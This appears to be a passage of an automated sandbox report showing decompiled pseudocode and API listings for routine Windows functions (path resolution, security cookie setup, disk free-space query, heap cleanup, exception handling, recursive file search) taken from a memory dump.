                                                    0x00000000
                                                    0x011d5326
                                                    0x011d5326
                                                    0x00000000
                                                    0x011d5326
                                                    0x011d5324
                                                    0x011d52e7
                                                    0x011d52e7
                                                    0x011d52e9
                                                    0x011d52e9
                                                    0x011d52eb
                                                    0x011d52f0
                                                    0x00000000
                                                    0x011d52f2
                                                    0x011d52f2
                                                    0x00000000
                                                    0x011d52f2
                                                    0x011d52f0

                                                    APIs
                                                    • memset.MSVCRT ref: 011D528C
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,00000000,?), ref: 011D5394
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D53D5
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$FullNamePath
                                                    • String ID:
                                                    • API String ID: 3158150540-0
                                                    • Opcode ID: 7c3cb870a0a0bf4b48a417cfc42239b6faf1400a7c6be65ed5152e79111d7c78
                                                    • Instruction ID: 1d65ef8af689fd46dd4e42ec56fa2d9855fdb2b9851c476d235c6caa985d31c1
                                                    • Opcode Fuzzy Hash: 7c3cb870a0a0bf4b48a417cfc42239b6faf1400a7c6be65ed5152e79111d7c78
                                                    • Instruction Fuzzy Hash: A102B535A005199BDF2DDFA8CC986A9B7F2FF88318F1941E9D80997245D774AE82CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E245C, Relevance: 9.2, APIs: 6, Instructions: 154fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E011E245C(WCHAR* __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v604;
				signed int _v608;
				void _v612;
				signed int _v616;
				void* _v620;
				intOrPtr _v624;
				WCHAR* _v628;
				void* _v632;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				intOrPtr _t44;
				void* _t45;
				void _t47;
				void* _t53;
				void _t54;
				void _t58;
				char* _t69;
				char* _t71;
				intOrPtr* _t73;
				signed int _t75;
				void* _t76;
				WCHAR* _t77;
				void* _t80;
				void* _t81;
				signed int _t83;
				void* _t84;
				void* _t91;
				void* _t96;
				void* _t97;
				short* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				int _t104;
				void* _t105;
				signed int _t106;
				signed int _t108;

				_t90 = __edx;
				_t77 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x274;
				_t42 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t42 ^ _t108;
				_t73 = __ecx;
				_v616 = __edx;
				_v628 = __ecx;
				_v624 = 0;
				_t99 =  &(__ecx[1]);
				do {
					_t44 =  *_t73;
					_t73 = _t73 + 2;
				} while (_t44 != 0);
				_t75 = _t73 - _t99 >> 1;
				if(_t75 > __edx) {
					L21:
					_t45 = 0;
				} else {
					_t97 =  &(__ecx[3]);
					_t101 = _t97;
					_v632 = _t101;
					do {
						_t47 =  *_t97 & 0x0000ffff;
						_v612 = _t47;
						if(_t47 == 0 || _t47 == 0x5c) {
							 *_t97 = 0;
							_t80 = FindFirstFileW(_t77,  &_v604);
							_t47 = _v612;
							 *_t97 = _t47;
							if(_t80 == 0xffffffff) {
								_t97 = _t97 + 2;
								_t101 = _t97;
								goto L17;
							} else {
								FindClose(_t80);
								if(_v604.cAlternateFileName != 0) {
									if(_a4 != 0) {
										L23:
										_t53 =  &(_v604.cAlternateFileName);
										goto L12;
									} else {
										_t69 =  &(_v604.cAlternateFileName);
										__imp___wcsnicmp(_t69, _t101, _t97 - _t101 >> 1);
										_t108 = _t108 + 0xc;
										if(_t69 != 0) {
											goto L11;
										} else {
											_t71 =  &(_v604.cFileName);
											__imp___wcsicmp(_t71,  &(_v604.cAlternateFileName));
											if(_t71 == 0) {
												goto L11;
											} else {
												goto L23;
											}
										}
									}
									L14:
									_t83 = _t81 - _t91 >> 1;
									_t90 = _t83 - (_t97 - _t101 >> 1);
									_v608 = _t83;
									_t75 = _t75 + _t90;
									if(_t75 >= _v616) {
										goto L21;
									} else {
										if(_t90 > 0) {
											_t84 = _t97;
											_t102 = _t84 + 2;
											do {
												_t58 =  *_t84;
												_t84 = _t84 + 2;
											} while (_t58 != _v624);
											_t103 = _t97 + _t90 * 2;
											memmove(_t103, _t97, 1 + (_t84 - _t102 >> 1) * 2);
											_t83 = _v608;
											_t108 = _t108 + 0xc;
											_t97 = _t103;
										}
										_t104 = _t83 + _t83;
										memcpy(_v632, _v620, _t104);
										_v632 = _v632 + _t104;
										_t108 = _t108 + 0xc;
										_t105 = _v632;
										_t90 = _v616 - (_t105 - _v628 >> 1);
										E011E1040(_t105, _v616 - (_t105 - _v628 >> 1), _t97);
										_t47 = _v616;
										_t101 = _t105 + 2;
										_t97 = _t101;
										L17:
										_t77 = _v628;
										_v632 = _t101;
										goto L6;
									}
									goto L8;
								} else {
									L11:
									_t53 =  &(_v604.cFileName);
								}
								L12:
								_t81 = _t53;
								_v620 = _t53;
								_t91 = _t81 + 2;
								do {
									_t54 =  *_t81;
									_t81 = _t81 + 2;
								} while (_t54 != _v624);
								goto L14;
							}
						} else {
							goto L6;
						}
						goto L8;
						L6:
						_t97 = _t97 + 2;
					} while (_t47 != 0);
					_t45 = 1;
				}
				L8:
				_pop(_t96);
				_pop(_t100);
				_pop(_t76);
				return E011E6FD0(_t45, _t76, _v8 ^ _t108, _t90, _t96, _t100);
			}












































                                                    0x011e245c
                                                    0x011e245c
                                                    0x011e2464
                                                    0x011e246a
                                                    0x011e2471
                                                    0x011e247a
                                                    0x011e247c
                                                    0x011e2483
                                                    0x011e2487
                                                    0x011e248b
                                                    0x011e248e
                                                    0x011e248e
                                                    0x011e2491
                                                    0x011e2494
                                                    0x011e249b
                                                    0x011e249f
                                                    0x011e25d2
                                                    0x011e25d2
                                                    0x011e24a5
                                                    0x011e24a5
                                                    0x011e24a8
                                                    0x011e24aa
                                                    0x011e24ae
                                                    0x011e24ae
                                                    0x011e24b1
                                                    0x011e24b8
                                                    0x011e24e3
                                                    0x011e24f2
                                                    0x011e24f4
                                                    0x011e24f8
                                                    0x011e24fe
                                                    0x011ed671
                                                    0x011ed674
                                                    0x00000000
                                                    0x011e2504
                                                    0x011e2505
                                                    0x011e2514
                                                    0x011e25a6
                                                    0x011ed62e
                                                    0x011ed62e
                                                    0x00000000
                                                    0x011e25ac
                                                    0x011e25b3
                                                    0x011e25bc
                                                    0x011e25c2
                                                    0x011e25c7
                                                    0x00000000
                                                    0x011e25cd
                                                    0x011ed619
                                                    0x011ed61e
                                                    0x011ed628
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ed628
                                                    0x011e25c7
                                                    0x011e2534
                                                    0x011e2538
                                                    0x011e2540
                                                    0x011e2542
                                                    0x011e2546
                                                    0x011e254c
                                                    0x00000000
                                                    0x011e2552
                                                    0x011e2554
                                                    0x011ed63a
                                                    0x011ed63c
                                                    0x011ed63f
                                                    0x011ed63f
                                                    0x011ed642
                                                    0x011ed645
                                                    0x011ed64e
                                                    0x011ed65d
                                                    0x011ed663
                                                    0x011ed667
                                                    0x011ed66a
                                                    0x011ed66a
                                                    0x011e255a
                                                    0x011e2566
                                                    0x011e256b
                                                    0x011e256f
                                                    0x011e2572
                                                    0x011e2585
                                                    0x011e2587
                                                    0x011e258c
                                                    0x011e2590
                                                    0x011e2593
                                                    0x011e2595
                                                    0x011e2595
                                                    0x011e2599
                                                    0x00000000
                                                    0x011e2599
                                                    0x00000000
                                                    0x011e251a
                                                    0x011e251a
                                                    0x011e251a
                                                    0x011e251a
                                                    0x011e251e
                                                    0x011e251e
                                                    0x011e2520
                                                    0x011e2524
                                                    0x011e2527
                                                    0x011e2527
                                                    0x011e252a
                                                    0x011e252d
                                                    0x00000000
                                                    0x011e2527
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e24bf
                                                    0x011e24bf
                                                    0x011e24c2
                                                    0x011e24c9
                                                    0x011e24c9
                                                    0x011e24ca
                                                    0x011e24d1
                                                    0x011e24d2
                                                    0x011e24d3
                                                    0x011e24de

                                                    APIs
                                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,00000000), ref: 011E24EC
                                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011E2505
                                                    • memcpy.MSVCRT ref: 011E2566
                                                    • _wcsnicmp.MSVCRT ref: 011E25BC
                                                    • _wcsicmp.MSVCRT ref: 011ED61E
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                    • String ID:
                                                    • API String ID: 242869866-0
                                                    • Opcode ID: de6a4b7375402375424036d3f698e5740b55eed9b4f24dc0db29432e51250165
                                                    • Instruction ID: fd707ee37c3a39e8e56c084c0ecf49c5ba5a461ac25c78ef01de136c490cb250
                                                    • Opcode Fuzzy Hash: de6a4b7375402375424036d3f698e5740b55eed9b4f24dc0db29432e51250165
                                                    • Instruction Fuzzy Hash: 7551E5755047018BCB28CFA8DC685ABB7E9EFC8714F15492DF99AC3244EB30D945CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E7513, Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E011E7513() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x11fd0b4; // 0x1805bc26
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x11fd0b4 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x11fd0b4 = _t39;
				}
				_t37 =  !_t36;
				 *0x11fd0b8 = _t37;
				return _t37;
			}











                                                    0x011e751b
                                                    0x011e751f
                                                    0x011e7523
                                                    0x011e7536
                                                    0x011e7540
                                                    0x011e754c
                                                    0x011e7555
                                                    0x011e755e
                                                    0x011e756f
                                                    0x011e7576
                                                    0x011e7582
                                                    0x011e7585
                                                    0x011e7589
                                                    0x011e7593
                                                    0x011e7598
                                                    0x011e7598
                                                    0x011e759a
                                                    0x011e759a
                                                    0x011e75a0
                                                    0x011e75a3
                                                    0x011e75ac

                                                    APIs
                                                    • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 011E7540
                                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E754F
                                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E7558
                                                    • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 011E7561
                                                    • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 011E7576
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                    • String ID:
                                                    • API String ID: 1445889803-0
                                                    • Opcode ID: ac9f1ae1da07457771ca0440c27a2869b638c5cfcaaa2793f40fc510ae5e922c
                                                    • Instruction ID: 91f36294d6aba23adbd744778a569813f9453fb769e7d45e21dc8ef99227def7
                                                    • Opcode Fuzzy Hash: ac9f1ae1da07457771ca0440c27a2869b638c5cfcaaa2793f40fc510ae5e922c
                                                    • Instruction Fuzzy Hash: ED113A71D05208EBDF24DFF8E65C6AEBBF5EF58314F55486AD411E7248EB309A408B41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011FA0D2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E011FA0D2(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				intOrPtr _v552;
				intOrPtr _v560;
				union _ULARGE_INTEGER _v564;
				union _ULARGE_INTEGER _v572;
				union _ULARGE_INTEGER _v580;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				WCHAR* _t51;
				char _t60;
				WCHAR* _t69;
				void* _t77;
				void* _t78;
				void* _t79;
				signed int _t81;

				_t76 = __edx;
				_t35 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t35 ^ _t81;
				_t79 = __edx;
				_v552 = _a8;
				_t78 = __ecx;
				E011DB6B9(__ecx);
				_v28 = 0;
				_v20 = 0x104;
				_t60 = 1;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					E011E0D89(_t76, _t79);
					_t51 = _v28;
					_t69 = _t51;
					if(_t51 == 0) {
						_t69 =  &_v548;
					}
					if( *_t69 != 0 && _t69[1] == 0x3a && _t69[2] == 0) {
						E011E0CF2(_t76, "\\");
						_t51 = _v28;
					}
					_v560 = 0;
					_v564.LowPart = 0;
					if(_t51 == 0) {
						_t51 =  &_v548;
					}
					GetDiskFreeSpaceExW(_t51,  &_v564,  &_v580,  &_v572);
					_t77 = 6;
					E011F7A11(_t78, _t77);
					_t54 = _v28;
					if(_v28 == 0) {
						_t54 =  &_v548;
					}
					_t76 =  &_v564;
					E011FAC75(_a4,  &_v564, 0xe, _t54, _v20);
					_t79 = _v28;
					if(_t79 == 0) {
						_t79 =  &_v548;
					}
					E011E274C(0x1213d00, 0x104, L"%5lu", _v552);
					_push(_t79);
					_t60 = E011F7C83(0x1213d00, _t76, _t78, 0x2379, 2, 0x1213d00);
				}
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t60, _t60, _v8 ^ _t81, _t76, _t78, _t79, _v28);
			}
























                                                    0x011fa0d2
                                                    0x011fa0dd
                                                    0x011fa0e4
                                                    0x011fa0ed
                                                    0x011fa0ef
                                                    0x011fa0f5
                                                    0x011fa0f7
                                                    0x011fa105
                                                    0x011fa110
                                                    0x011fa113
                                                    0x011fa115
                                                    0x011fa118
                                                    0x011fa141
                                                    0x011fa14e
                                                    0x011fa153
                                                    0x011fa156
                                                    0x011fa15a
                                                    0x011fa15c
                                                    0x011fa15c
                                                    0x011fa167
                                                    0x011fa181
                                                    0x011fa186
                                                    0x011fa186
                                                    0x011fa189
                                                    0x011fa18f
                                                    0x011fa197
                                                    0x011fa199
                                                    0x011fa199
                                                    0x011fa1b5
                                                    0x011fa1bd
                                                    0x011fa1c0
                                                    0x011fa1c5
                                                    0x011fa1ca
                                                    0x011fa1cc
                                                    0x011fa1cc
                                                    0x011fa1d8
                                                    0x011fa1e1
                                                    0x011fa1e6
                                                    0x011fa1eb
                                                    0x011fa1ed
                                                    0x011fa1ed
                                                    0x011fa209
                                                    0x011fa20e
                                                    0x011fa220
                                                    0x011fa220
                                                    0x011fa225
                                                    0x011fa23e

                                                    APIs
                                                    • memset.MSVCRT ref: 011FA118
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 011FA1B5
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FA225
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$DiskFreeSpace
                                                    • String ID: %5lu
                                                    • API String ID: 2448137811-2100233843
                                                    • Opcode ID: ebb02f2ffb30847b32b531025e7b0ba2a3c78bd1bdf5fa6874c0b213cc1816fe
                                                    • Instruction ID: 87fd769d561e228706daa58c6bbd286e175035a5022efa5d7c3923d0a213f1a9
                                                    • Opcode Fuzzy Hash: ebb02f2ffb30847b32b531025e7b0ba2a3c78bd1bdf5fa6874c0b213cc1816fe
                                                    • Instruction Fuzzy Hash: 46417A71E002196BDF29DBA4DC99AEEB7B8FF18344F04409DE609A7141E7749E85CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F1914, Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E011F1914(void* __ecx) {
				void* _t20;
				void* _t22;
				void* _t23;
				void** _t25;

				_t23 = __ecx;
				_t22 =  *(__ecx + 0x10);
				_t20 = _t22 + ( *(__ecx + 0x14) & 0x0000ffff) * 0x34;
				if(_t22 != _t20) {
					_t25 = _t22 + 0x2c;
					do {
						RtlFreeHeap(GetProcessHeap(), 0,  *_t25);
						 *_t25 =  *_t25 & 0x00000000;
						_t25 =  &(_t25[0xd]);
						 *(_t25 - 0x30) =  *(_t25 - 0x30) & 0x00000000;
					} while (_t25 - 0x2c != _t20);
					_t22 =  *(_t23 + 0x10);
				}
				RtlFreeHeap(GetProcessHeap(), 0, _t22);
				 *(_t23 + 0x10) =  *(_t23 + 0x10) & 0;
				 *((intOrPtr*)(_t23 + 0x14)) = 0;
				return 0;
			}







                                                    0x011f1918
                                                    0x011f191e
                                                    0x011f1924
                                                    0x011f1928
                                                    0x011f192b
                                                    0x011f192e
                                                    0x011f1939
                                                    0x011f193f
                                                    0x011f1942
                                                    0x011f1945
                                                    0x011f194c
                                                    0x011f1950
                                                    0x011f1953
                                                    0x011f195e
                                                    0x011f1966
                                                    0x011f1969
                                                    0x011f196e

                                                    APIs
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,011F1735), ref: 011F1932
                                                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 011F1939
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,011F1735), ref: 011F1957
                                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F195E
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 7fa54d8046fcaec72ed39ab8255b7baf4830f4fc760f2e6ce6597c242f6d95ab
                                                    • Instruction ID: 7343d35b5ab0400354313713700172d81f559cc8d294384285f59823aef86930
                                                    • Opcode Fuzzy Hash: 7fa54d8046fcaec72ed39ab8255b7baf4830f4fc760f2e6ce6597c242f6d95ab
                                                    • Instruction Fuzzy Hash: 26F04F72610201ABDB24DFA0E88CBA5B7F8FF58326F10092DF641C6440EB74E5D5CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E6FE3, Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E011E6FE3(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                                    0x011e6fea
                                                    0x011e6ff3
                                                    0x011e700c

                                                    APIs
                                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E7119,011D1000), ref: 011E6FEA
                                                    • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(011E7119,?,011E7119,011D1000), ref: 011E6FF3
                                                    • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,011E7119,011D1000), ref: 011E6FFE
                                                    • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,011E7119,011D1000), ref: 011E7005
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                    • String ID:
                                                    • API String ID: 3231755760-0
                                                    • Opcode ID: 14b00860cd93b38cd020d9d54970c92856937f214fa9e9bccdeaaf5e0bc664c8
                                                    • Instruction ID: 31835f397d3bad6aebd802a71f7ccd3bac52b24c836e675622d32b9b528a64e3
                                                    • Opcode Fuzzy Hash: 14b00860cd93b38cd020d9d54970c92856937f214fa9e9bccdeaaf5e0bc664c8
                                                    • Instruction Fuzzy Hash: 48D0C932580104ABCF20ABE1F81CA893E28EB9431AF044420F309C2014CE714491CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F31DC, Relevance: 4.8, APIs: 3, Instructions: 274fileCOMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E011F31DC(void* __ecx, long __edx, long _a4, intOrPtr _a8, signed short* _a12) {
				signed int _v8;
				char _v564;
				struct _WIN32_FIND_DATAW _v612;
				signed short* _v616;
				signed int _v620;
				signed int _v624;
				void* _v628;
				signed int _v632;
				short* _v636;
				intOrPtr* _v640;
				intOrPtr _v644;
				short* _v652;
				intOrPtr _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				signed int _t71;
				intOrPtr _t83;
				WCHAR* _t87;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				short _t100;
				intOrPtr _t101;
				WCHAR* _t107;
				signed short* _t119;
				void* _t120;
				short* _t121;
				signed int _t123;
				intOrPtr _t124;
				signed int _t125;
				void* _t129;
				signed short* _t130;
				short* _t134;
				intOrPtr* _t137;
				WCHAR* _t142;
				char* _t146;
				char* _t147;
				short* _t148;
				intOrPtr* _t149;
				WCHAR* _t157;
				intOrPtr* _t162;
				WCHAR* _t168;
				signed int _t170;
				void* _t177;
				signed short* _t178;
				short* _t179;
				signed int _t180;
				void* _t181;
				signed int _t183;
				signed int _t185;
				void* _t186;
				WCHAR* _t189;
				intOrPtr* _t191;
				signed int _t192;

				_t194 = (_t192 & 0xfffffff8) - 0x274;
				_t65 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t65 ^ (_t192 & 0xfffffff8) - 0x00000274;
				_v612.ftCreationTime.dwFileAttributes = __edx;
				_t162 = __ecx;
				_t119 = _a12;
				_v612.dwFileAttributes = _a4;
				_v628 = __ecx;
				_t7 = _t162 + 2; // 0x2
				_t129 = _t7;
				_v616 = _t119;
				_t185 = 0;
				do {
					_t68 =  *_t162;
					_t162 = _t162 + 2;
				} while (_t68 != 0);
				_t130 = _t119;
				_t164 = _t162 - _t129 >> 1;
				if( *_t119 == 0) {
					L53:
					_t69 = 0;
				} else {
					do {
						_t178 = _t130;
						do {
							_t71 =  *_t130 & 0x0000ffff;
							_t130 =  &(_t130[1]);
						} while (_t71 != 0);
						_t185 = _t185 + (_t130 - _t178 >> 1) + _t164;
					} while ( *_t130 != 0);
					if(0 == _t185) {
						goto L53;
					} else {
						_t9 = _t185 + 1; // 0x1
						_t187 = _t9 & 0x0000ffff;
						_v624 = _t9 & 0x0000ffff;
						_t179 = E011E00B0(_t187 + _t187);
						if(_t179 != 0) {
							_t134 = 0;
							_v632 = _t119;
							_t121 = _t179;
							if( *_v616 != 0) {
								do {
									E011E1040(_t121, _t187 - (_t121 - _t179 >> 1), _v628);
									E011E18C0(_t121, _t187 - (_t121 - _t179 >> 1), _v636);
									_t191 = E011DD7E6(_v640);
									_t134 = _t121;
									_v640 = _t191;
									_t121 = E011DD7E6(_t134);
									_t187 = _v632;
								} while ( *_t191 != 0);
							}
							_push(_t134);
							 *_t121 = 0;
							_v644 = E011D7EEC(_t121, _v612.ftCreationTime.dwFileAttributes, _v612.dwFileAttributes, _a8, _t179);
							E011E0040(_t179);
							_t122 = _v640;
							_t137 = _v640;
							_t24 = _t137 + 2; // 0x2
							_t164 = _t24;
							do {
								_t83 =  *_t137;
								_t137 = _t137 + 2;
							} while (_t83 != 0);
							_t25 = (_t137 - _t164 >> 1) + 2; // 0x0
							_t180 = _t25;
							_v624 = _t180;
							_t189 = E011E00B0(_t180 + _t180);
							if(_t189 == 0) {
								goto L8;
							} else {
								E011E1040(_t189, _t180, _t122);
								_t87 = _t189;
								_t142 = _t189;
								if( *_t189 != 0) {
									do {
										_t142 = _t87;
										_t87 =  &(_t87[1]);
									} while ( *_t87 != 0);
								}
								_t28 =  &(_t142[1]); // 0x2
								_t164 = _t180;
								_v632 = _t28;
								E011E18C0(_t189, _t180, "*");
								_t123 = FindFirstFileW(_t189,  &_v612);
								_v632 = _t123;
								 *_v636 = 0;
								if(_t123 == 0xffffffff) {
									_t124 = _v636;
								} else {
									do {
										if((_v612.ftCreationTime.dwFileAttributes & 0x00000010) == 0) {
											L46:
											_t124 = _v636;
											goto L47;
										} else {
											_t146 = ".";
											_t96 =  &_v564;
											while(1) {
												_t164 =  *_t96;
												if(_t164 !=  *_t146) {
													break;
												}
												if(_t164 == 0) {
													L23:
													_t125 = 0;
													_t97 = 0;
												} else {
													_t164 =  *((intOrPtr*)(_t96 + 2));
													_t38 =  &(_t146[2]); // 0x200000
													if(_t164 !=  *_t38) {
														break;
													} else {
														_t96 = _t96 + 4;
														_t146 =  &(_t146[4]);
														if(_t164 != 0) {
															continue;
														} else {
															goto L23;
														}
													}
												}
												L25:
												if(_t97 == 0) {
													goto L46;
												} else {
													_t147 = L"..";
													_t98 =  &_v564;
													while(1) {
														_t164 =  *_t98;
														if(_t164 !=  *_t147) {
															break;
														}
														if(_t164 == 0) {
															L31:
															_t99 = _t125;
														} else {
															_t164 =  *((intOrPtr*)(_t98 + 2));
															_t41 =  &(_t147[2]); // 0x2e
															if(_t164 !=  *_t41) {
																break;
															} else {
																_t98 = _t98 + 4;
																_t147 =  &(_t147[4]);
																if(_t164 != 0) {
																	continue;
																} else {
																	goto L31;
																}
															}
														}
														L33:
														if(_t99 == 0) {
															goto L46;
														} else {
															_t168 = _t189;
															_t42 =  &(_t168[1]); // 0x2
															_t148 = _t42;
															do {
																_t100 =  *_t168;
																_t168 =  &(_t168[1]);
															} while (_t100 != _t125);
															_t149 =  &_v564;
															_t170 = _t168 - _t148 >> 1;
															_t181 = _t149 + 2;
															do {
																_t101 =  *_t149;
																_t149 = _t149 + 2;
															} while (_t101 != _t125);
															_t45 = _t170 + 2; // 0x0
															_t183 = _t45 + (_t149 - _t181 >> 1);
															if(_t183 <= _v624) {
																_t183 = _v624;
																goto L45;
															} else {
																_t164 = _t183 + _t183;
																_t107 = E011E0100(_t189, _t183 + _t183);
																if(_t107 == 0) {
																	_t124 = 1;
																} else {
																	_t189 = _t107;
																	_v624 = _t183;
																	_t157 = _t107;
																	while( *_t107 != _t125) {
																		_t157 = _t107;
																		_t107 =  &(_t107[1]);
																	}
																	_t49 =  &(_t157[1]); // 0x2
																	_v632 = _t49;
																	L45:
																	E011E18C0(_t189, _t183,  &_v564);
																	E011E18C0(_t189, _t183, "\\");
																	_t164 = _v620;
																	_t124 = E011F31DC(_t189, _v620, _v624, _a8, _v628);
																	_v656 = _t124;
																	 *_v652 = 0;
																	goto L47;
																}
															}
														}
														goto L50;
													}
													asm("sbb eax, eax");
													_t99 = _t98 | 0x00000001;
													goto L33;
												}
												goto L50;
											}
											asm("sbb eax, eax");
											_t97 = _t96 | 0x00000001;
											_t125 = 0;
											goto L25;
										}
										L50:
										FindClose(_v628);
										goto L52;
